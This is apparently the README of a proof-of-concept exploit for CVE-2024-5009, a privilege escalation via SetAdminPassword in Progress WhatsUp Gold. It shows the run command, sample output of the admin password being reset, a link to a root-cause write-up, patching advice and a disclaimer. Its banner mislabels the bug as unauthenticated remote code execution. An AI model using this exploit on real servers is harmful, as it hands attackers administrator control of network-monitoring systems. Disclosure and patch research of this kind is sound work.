
Эксплойт для CVE-2024-5009
PoC для повышения привилегий через SetAdminPassword в Progress WhatsUp Gold (CVE-2024-5009)
Анализ первопричины уязвимости можно найти в моём блоге: https://summoning.team/blog/progress-whatsup-gold-privesc-setadminpassword-cve-2024-5009/
python3 CVE-2024-5009.py --target https://192.168.0.231/
_______ _ _ _______ _______ _____ __ _ _____ __ _ ______ _______ _______ _______ _______
|______ | | | | | | | | | | | \ | | | \ | | ____ | |______ |_____| | | |
______| |_____| | | | | | | |_____| | \_| __|__ | \_| |_____| . | |______ | | | | |
(*) Progress WhatsUp Gold GetFileWithoutZip Unauthenticated Remote Code Execution (CVE-2024-5009)
(*) Exploit by Sina Kheirkhah (@SinSinology) of SummoningTeam (@SummoningTeam)
(*) Technical details: https://summoning.team/blog/progress-whatsup-gold-privesc-setadminpassword-cve-2024-5009/
(^_^) Prepare for the Pwnage (^_^)
(*) Generated random password is: e9513bc41e2a9acf
(*) Escalating...
(+) Escalation done, new admin password is: e9513bc41e2a9acf
Обновитесь до последней версии или примените меры защиты, следуя инструкциям из бюллетеня безопасности Progress
Это программное обеспечение создано исключительно для академических исследований и разработки эффективных методов защиты и не предназначено для атаки на системы, за исключением случаев явного разрешения. Сопровождающие проекта не несут ответственности за неправомерное использование программного обеспечения. Используйте ответственно.